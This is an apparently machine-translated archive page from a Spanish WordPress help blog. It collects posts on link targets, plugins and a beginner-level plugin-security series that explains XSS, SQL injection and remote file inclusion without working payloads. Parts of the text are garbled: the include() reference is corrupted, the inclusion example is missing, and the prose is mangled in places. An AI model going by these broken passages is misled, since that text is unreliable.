About the target of the links

Do not open new windows in your links – Let the user have control. If you think that opening another window prevents the user from leaving your page, you are wrong. Do not fill the user's computer with trash. If they want to return to your blog, they will return. The button back is the most used on the internet.

The last fr personally seized me opened my mind, and is a universal truth, it may give some sense of abandonment if they do click on a link and we open it on the same screen instead of abrilo on another I always used the last one, but as Adseok says: [19659004] If you want to go back to your blog, they will come back.

WordPress Tweaks – Tweak your blog

WordPress Tweaks is a curious and great plugin for WordPress that has just been published. Its function is to introduce the personalization to the maximum of your blog through it and without touching a line of code.

A champion of personalization that, I suppose, will expand the "tweaks" so we will have to keep track .

WordPress plugin security: less is More

Continuing with the series of plugins security in WordPress the route map of these articles is growing a bit more . Fortunately it is adapting to all kinds of users . On pain of being repetitive, this series is designed for the non-developer, the average user . Security is a mystified area that requires some demystification.

There are very few people who know how to configure WordPress to the first to start blogging. Many have never blogged before and are fond of the code. Others, come to WordPress from other systems because they have heard about the broad support, the easy-to-use interface and, yes, the plethora of available plugins. It sounds like a fantastic golden amphora at the end of the Rainbow, right? Especially for people who emerge from the "hell of plugins" of the Movable Type platform.

Normally, the first thing they ask me as an "expert" in WordPress is "Where do I get good plugins from?" answer "To do what?" 🙂 (and I'm being honest). There are a couple of things you should know about plugins. The first thing is that plugins should be used to meet needs, and the second is that plugins should be used sparingly .

Plugins should be used to meet needs
The easiest for a user of WordPress is like crazy to look for plugins to install. It reminds me of high school girls who customize backpacks and folders. People do the same with their blogs. The first thing they do is start to customize it and add functions.


Plugins must use it to cover needs . Do you need to have that gizmo or that doohicky ? Maybe yes and maybe not. Let's see, every time a plugin is activated another attack vector is created . That does not mean that an attack is successful. It only means that an attacker has one more door to try to do it. If you do not need that plugin, do not activate it . Similarly, if you stop using that plugin, disable it .

Plugins should be used sparingly
Following this line, the plugins should be used at least . Depending on my needs, it is not uncommon to set up a blog with only 3 or 4 plugins. The more plugins you use more ways of attack correct? (Additionally, if the plugin allows you to put things in your template, you could be disrupting your blog a bit more, but that's a different matter, an aesthetic issue.)

 WP security

Read other articles from the series on Security in WordPress plugins :

  1. The golden rule
  2. What is dangerous?
  3. Dangerous combinations
  4. Less is more

NOTICE : this publication It's two or more years ago. If it's a code or a plugin it might not work in the latest versions of WordPress, and if it's a news story it might be obsolete. Then do not say we have not warned you.

Loading …

That may also help you:

Vote for WordPress!

Webware opened the voting for the annual Webware Awards.


This award is generated by voting from users around the world who choose their favorite 2.0 applications among all available, there are several categories , and WordPress is nominated in the category "publications and photography" along with other big companies.

WordPress was the winner in 2007, could it be this year? [19659004] If you think that WP deserves to be (like us) votalo in this link.

This is an original content of WordPress Help – Resources, themes, plugins and tutorials in Spanish and published Guillermo Mayoraz first here: Vote for WordPress!

How to integrate WordPress and phpBB forums • WordPress Help

If I had known this before I had been encouraged but now with the forum in SMF I am happy. Anyway it is good to note that there is a WordPress plugin that greatly facilitates the integration between a phpBB forums system and your blog .

The plugin in question is called ] WP-United and not only allows you a integration of users of the blog and forum but offers widgets to show on the blog the latest forum posts, forum statistics and much more.

You can see a demo on this link or directly download the plugin here .

Between Blogs grows and seduces • WordPress Help

A new blogger has just joined the network Entre Blogs . True Seduction joins Between Blogs with what we already offer 12 visions of the blogosphere, with original quality content and veteran bloggers that offer us their particular vision of what they know best and share.

In True Seduction you can find courses and seminars on seduction and personal development relationships of couples and self-help . A very interesting blog if you are looking for help to gain confidence .

Dangerous Combinations • WordPress Help

I have been fighting with this question since the last entry of the would be about the plugin security in WordPress . As I am aware that this series will be used as a resource by the huge WordPress community, I think it is necessary to abstract these articles sufficiently so that non-technical users can understand it, and that does not isolate a part of the rest without leaving them orphaned. [19659003] What is a dangerous combination?

Plugins depend on user permissions

Plugins that give registered users the ability to do something should be scrutinized. With the arrival of the WordPress 2.x series many plugins that worked on the basis of the 1.5.x series no longer work as expected. This is because WordPress 1.5 used User Levels a range of numbers ranging from 0 to 10 and that offered individuals various levels of access. In WordPress 2.x the user levels yielded in favor of the Roles and Capabilities which offer individuals roles as Administrator, Publisher, Author, Contributor or Subscriber.

The plugins that rely on user permissions can improperly offer access to features that should be left to an administrator . For example, a plugin can place a submenu in the admin panel on the Manage page or the Options page that could allow access to other features of those areas. By default, WordPress restricts access to these pages to users with privileges. A poorly written plugin could spoil .

Careless use of the Roles Manager

Owen Winkler wrote a very popular plugin called Role Manager which, as powerful and useful as it is (and which I use in several blogs) increases the opportunity to open a back door to a user with bad intentions. I love this plugin since it allows me the opportunity to customize user access to WordPress functionalities .. It even allows me to create new user roles, such as "Designer", that could give access to my Designer to the Presentation menu without having to give complete administration privileges.

However, if I am not cautious, I could customize permissions in such a way as to allow inappropriate access to areas of my blog . You may think that only a careless blogger would allow everyone access to a blog. Some blogs legitimately restrict, to say the least, comments to registered users, and if they are registered users have limited access to the administration panel (mostly to change passwords and other options of the user profile). Using the Role Manager plugin, in combination with the previous element, plugins that depend on permissions, could open your blog to a world of horror.

There are some dangerous combinations . There is more and it could even be more specific. Maybe in a later article.

Read other articles in the series about Security in WordPress plugins :

  1. The golden rule
  2. What is dangerous?
  3. Dangerous combinations
  4. ] Less is more

NOTICE : this publication is from two years ago or more. If it's a code or a plugin it might not work in the latest versions of WordPress, and if it's a news story it might be obsolete. Then do not say we have not warned you.

Loading …

That may also help you:

All in one SEO pack guide

All in one SEO pack is a marvel in a plugin format that was designed to make life easier for any blogger who wants to improve their positioning in search engines.

"All in one" comes from the spirit of simplifying the SEO of the blog in one piece, which contemplates and triggers the following factors to improve the ranking of our weblog:

He takes care of it, and does it very well.

As it is a .ZIP file, we must unzip the directory.

Then we explore the directory, we must upload the one that contains the files.

And copy the directory to WP-Content / Plugins of our server.

If the transfer was successful, we only need to enter our WordPress panel (as administrator)

Ready, we click on activate and we have AIOSP ready to be configured.


WordPress Plugins Security: What is dangerous?

This week I started the series of WordPress plugins security . We have established that the golden rule in web security is to check the "gateways". And this is to monitor the areas of a website that an attacker could use to send data to your website. I would like to delve deeper into this today.

WordPress support expert, Podz, asks in his blog, " What is dangerous? "

The answer is in understand the vectors of attack . Attack vectors, such as Crossed Scripts, SQL Injections and Remote File Inclusion, are some of the most used methods to attack a web. If you understand the principles on which they are based you will have a greater understanding of what you need to look for in a plugin. So let's go to it do not you think?

Crossed Scripts (XSS)

The Crossed Scripts have been described by Network World as the " greatest threat of security ". Crossed scripts is a general term that refers to the injection of javascript into a page. And since the javascript zone allows the browser to do a wide variety of things, including the potential of executing code in the file system allowing an attacker a vector to get that code into your computer or web is dangerous. An example of XSS would be the failure of Democracy 1.2 . A common entry point of an XSS is an HTML form (contact form, tagboard etc) or the address bar.

SQL injection

From a programming point of view, the SQL injection occurs when the input from the browser (either from a form or the address bar or whatever) is improperly filtered to make it "secure" and then directly feeds a database. This attack vector would allow the content of a web (that is supported by databases) to be altered or even deleted . It could also be used in combination with XSS to inject malicious javascript or server scripts into the content of a page.

Remote File Inclusion

A third attack vector that should be avoided is the inclusion of remote file. This is to use a PHP function ( <a href = "http://us2.php.net/incm VFR# 6 ^ude()) to insert a piece of code hosted on Any site and executed on the remote server In other words, an attacker can write a small script that registers IP addresses, cookies, etc. and if you can include a PHP script on your site, you can provide valuable information to the attacker The IFR is usually found when a user input (form, address bar) is directly included in a include () .

For example, a link of this type: http://example.com/?page=about could have some code that provides the right content This kind of sloppy code is more common than you imagine. of the developer could be, in this example, include the contents of about.php on the main page. what would happen if I send this request to my browser:
Then, your page would be actually executing this order :

A very dangerous issue.

How does this affect WordPress?

In the following articles of this series we will take a look at the security implications specific to WordPress plugins ] Any plugin that is used should be inspected initially to see if it allows interaction with the user. If you allow user interaction you might be prone to one of these vector attacks .

Do not assume, however, that a plugin that accepts interaction is dangerous. It is a question of the code and the developer to offer an appropriate and secure user input .

Read other articles in the series about WordPress plugins security :

  1. The golden rule
  2. What is dangerous?
  3. Dangerous combinations
  4. Less is more

NOTICE : This publication is from two years ago or more. If it's a code or a plugin it might not work in the latest versions of WordPress, and if it's a news story it might be obsolete. Then do not say that we have not warned you.

Loading …

That may also help you:

4 tips (more) to avoid being hacked

A tip to be sure is never bad, especially when, although they are quite logical, they remind us that sometimes we sin to sleep in the laurels when everything works well …

In WPThemesPlugin published some very useful tips to avoid a hack, which we can add to all of us who come publishing to date, we add these four:

Have the latest version of the software.

This should apply to both WordPress and plugins.

Luckily now the plugins panel warns us when we have an outdated one:


… and offers us the link to download

Disable and remove what we do not use.

It would be something unfortunate that hackeen a blog for a plugin that is not used, but it happens.

The rule assumes that the more software we have installed, the more likely we are to be vulnerable to an attack.

So the best thing we can do in this case is to uninstall any plugin that do not use, also step, take the opportunity to clean the blog removing those themes that we ever load "to try" and finally delete those posts that were eternally draft, do not happen again as the vulnerability known in 2.3.2 … [19659003] Only download and use trusted code.

Download WordPress from the official site, and plugins from the site of its creators.

Why should I pay attention to this guy?

Because, being open source, anyone with programming skills can insert their own code and redistribute it, and after that, most of the unsuspecting mortals for not following this guide use You can use a plugin or the same CMS without realizing that you have a Trojan-sized backdoor.

Be careful when including Javascript!

The Javascript code allows you to do a lot of things on a site, even install malware.

You only have to include JavaScript programmed by trusted entities, such as Google Adsense (if you trust them …)

NOTICE : this publication is from two years ago or more . If it's a code or a plugin it might not work in the latest versions of WordPress, and if it's a news story it might be obsolete. Then do not say we have not warned you.

Loading …

That may also help you: